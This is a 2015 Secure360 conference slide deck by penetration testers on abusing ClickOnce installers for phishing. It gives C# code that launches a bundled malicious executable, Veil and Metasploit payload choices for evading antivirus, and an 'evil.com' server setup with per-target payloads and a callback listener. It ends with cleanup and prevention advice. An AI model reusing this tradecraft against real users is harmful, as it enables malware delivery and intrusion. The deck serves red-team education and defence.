All You Need is One - A ClickOnce Love Story - Secure360 2015

Celebrating a decadeof guiding securityprofessionals.

@Secure360 or #Sec360 www.Secure360.org

All You Need Is One - A ClickOnce Love Story

Ryan Gandrud

Cody Wass



Introduction

• Ryan Gandrud

– Penetration tester

– Computer enthusiast

• Cody Wass

– Web applications

– Scotch aficionado



Overview

• ClickOnce?

• Phishing-phriendly pheatures

• Creating a malicious ClickOnce application

• Phishing setup

• Issues and pitfalls

• Demo

• Prevention



ClickOnce WTF?

• ClickOnce – What is it?

– ClickOnce is a wrapper that sitsaround a Windows executable to “install” it on a machine

– Used by application administrators to deploy installations to users in thenetwork

– Supports multiple deployment methods(web, network share, local execution)



ClickOnce Internals

• ProjectName.application– Contains the location of the manifest and application version

information

• ProjectName.exe.config.deploy– Contains application settings (i.e. connection strings, etc.)

• ProjectName.exe.deploy– The (potentially malicious) executable that will be run by a user

• ProjectName.exe.manifest– Manifest file containing application version, .NET versions

supported, permission level requested, and signatures for the other files

– Contains the file name for the executable



ClickOnce Certificate Signing

• ClickOnce and .NET support signing applications

• Authenticode – Microsoft cert-based signing technology used to verify the authenticity of publisher

• Need to “acquire” an code-signing Authenticode certificate from a Certificate Authority (CA)

• Signing stages available

– Signed (CA)

– Self-signed (MakeCert.exe in .NET)

– Unsigned (No cert used)



ClickOnce Trust Architecture

• Applications and how they are executed are based on a trust architecture separated into different execution source zones

• ClickOnce allows permitted applications to elevate privileges automatically (Trusted Sites) or through prompting the user

• Prompting levels are controlled by the following registry key

– \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel



ClickOnce Trust Architecture (cont.)

• These are features: "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator“

• “If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions.”

• “If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started.”

MSDN:https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx




• When ClickOnce was originally being developed in .NET 2.0 Beta 2, permissions looked promising with the Internet zone being restricted to applications signed by a valid certificate.

Zone Applications

My Computer Enabled

Local Intranet Enabled

Trusted Sites Enabled

Internet Enabled for signed apps

Untrusted Sites Disabled




• Unfortunately, Microsoft decided to change this, specifically the Internet zone, and not for the best

• Now, by default, ClickOnce packages that come from the Internet allow a user to grant the application temporary admin privileges in order to install

Zone Applications

My Computer Enabled

Local Intranet Enabled

Trusted Sites Enabled

Internet Enabled

Untrusted Sites Disabled



Owning With a Click

• Why use ClickOnce application?

– ClickOnce is supported on all modern Windows operating systems since it relies on .NET

– All distributions come with at least .NET 2.0 since Windows Server 2k3

– .NET supports backwards compatibility

– Dead simple to write

– Public browser exploits are highly version specific and more often than not, crash the victim’s browser



Owning With a Click (cont.)

• Originally meant to be deployed using Windows Internet Explorer

– ClickOnce is supported by IE 6.0+

– Now supported by Firefox and Chrome using third party addons (.NET 3.5+)

• Minimizes user interaction

• Delivering malicious code through multiple options

– It’s a .NET project – write your own

– Include malicious executable as a resource



Payloads

• Roll your own payload

– Our original vector

– Flagged by AV

• Standard Metasploit payload

– Also attempted

– Reverse_HTTPS returned broken shells• Assumed due to AV or something inline during delivery of second

Meterpreter stage



Payloads (cont.)

• Powershell

– Justin@sixdub did a great write-up on using Powershell commands instead of an executable for a Meterpreter callback with ClickOnce

– Pros: • Powershell command runs in memory – never touches disk

– Cons: • Difficulty in changing payloads

• ClickOnce is already on disk

http://www.sixdub.net/?p=555



Payloads (cont.)

• Veil

– Pros:

• Payloads written in different languages

• Encrypted Payloads – less likely to get caught by AV

– Cons:

• Static “random” Meterpreter callback

• This is an issue with how Metasploit handles stagers– Will be fixed (hopefully) soon

• We decided to go with Veil since we to avoid AV detection during our Red Team engagement



Payloads (cont.)

• Problem:

– Static Meterpreter callbacks from targets

• Solution?:

– Dynamically generating individualized Veil payloads



Creating a ClickOnce Application

• Visual Studio is used to create ClickOnce applications

– The free edition of Visual Studio 2013 supports ClickOnce publishing

• Start a new console application project within Visual Studio

– No GUI popup during execution



Creating a ClickOnce Application (cont.)

• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe)

static class Program

{

static void Main()

{

//Starting a new process executing the malicious exe

System.Diagnostics.Process p = new System.Diagnostics.Process();

p.StartInfo.UseShellExecute = false;

p.StartInfo.RedirectStandardOutput = false;

p.StartInfo.FileName = "ClickOnceInc.exe";

p.Start();

}

}




• Ensure that your application uses the correct version of .NET so the application runs properly.

• Here, .NET 3.5 was chosen by navigating to the Application tab on the left, and selecting the Target Framework from the dropdown.







• Include your malicious binary into the project by clicking and dragging it over your Solution Explorer




• In the Properties of the application under Publish:

– Ensure the Install Mode is set to “available online only”

• This prevents the application from showing up in the Start Menu

– Clicking the Application Files… button

• Exclude the hash for the ClickOnceInc.exe

– Dynamic payload generation changes the hash







• Clicking the Publish button, follow the wizard to publish the ClickOnce application to your local drive

• There should be multiple files/directories

– Application Files directory

– Evil Survey.application

– Publish.htm

– Setup.exe






Server Setup

• Web server with ClickOnce-specific directories

– Kali with Veil, Metasploit, and Apache

• Apache mod_rewrite

– GET evil.com?u={ID} -> evil.com/{ID}/evil.application

– Combined with dynamic Veil payloads, allowed easy analytics and post-mortem data gathering.



Callback Listener

• Our solution:

– Metasploit listener

• Phishing scenario – targets are workstations

• Most likely have outbound http access

• Limited window of engagement

• Egress filtering– ssh / icmp / dns tunneling



Pitfalls

• Outdated packages / dependencies

– Veil, Python, Wine.

• Signing restrictions

– No signing allowed with dynamic payloads

• No easy way to use mage.exe on linux

– Self-signed certs are only marginally better



Cleanup

• ClickOnce install directory:

– %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}

• C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}



Cleanup

• Add/Remove Programs

• Delete relevant AppData folder

• Nuke everything:

– Note: This will clear the entire online application cache.

– No need for elevated privileges, AppCaches are user-specific.

rundll32 dfshim CleanOnlineAppCache



Demo

• Client:

– Windows 7

• Server (evil.com):

– Kali running Apache to serve file

– Metasploit listener running to catch callback



Preventative Measures

• Typical Anti-Phishing Techniques– User education

• Users continue through “… a quarter of Google Chrome’s malware and phishing warnings”

– Endpoint protection

• Signatures lag behind usage

• Heuristics require a practical balance

• Limited usefulness for other phishing-based vectors

– Least privileged configurations




• ClickOnce-Specific Techniques

– Code Access Security

• ClickOnce applications can specify a “permissions level”

• Default: Full Trust – Requires prompt for elevation




• Disabling Trust Prompt– \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFra

mework\Security\TrustManager\PromptingLevel

– Trust prompt is controlled by zone• Untrusted Sites

• Internet

• My Computer

• Local Intranet

• Trusted Sites




String Value subkey Value

Internet Enabled

UntrustedSites Disabled

MyComputer Enabled

LocalIntranet Enabled

TrustedSites Enabled

Option Registry setting value

Enable the trust prompt. Enabled

Restrict the trust prompt. AuthenticodeRequired

Disable the trust prompt. Disabled




• Windows 8

– SmartScreen Filter

• Enabled by default

• Adds another layer after user clicks ‘run’ for anything not signed by a recognized CA

• Default ‘OK’ action results in application not running



Flowchart by Robin Shahan (@robindotnet)



Questions?



More Information / References

• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness

– Devdatta Akhawe University of California, Berkeley, [email protected]

– Adrienne Porter Felt Google, Inc, [email protected]

• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/

• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx

• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx

• https://msdn.microsoft.com/en-us/library/ee308453.aspx

• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/

• https://blog.netspi.com/bypassing-av-with-veil-evasion/

• https://github.com/rapid7/metasploit-framework/issues/4895

• http://www.sixdub.net/?p=555

• https://blog.netspi.com/

Technology

All You Need is One - A ClickOnce Love Story - Secure360 2015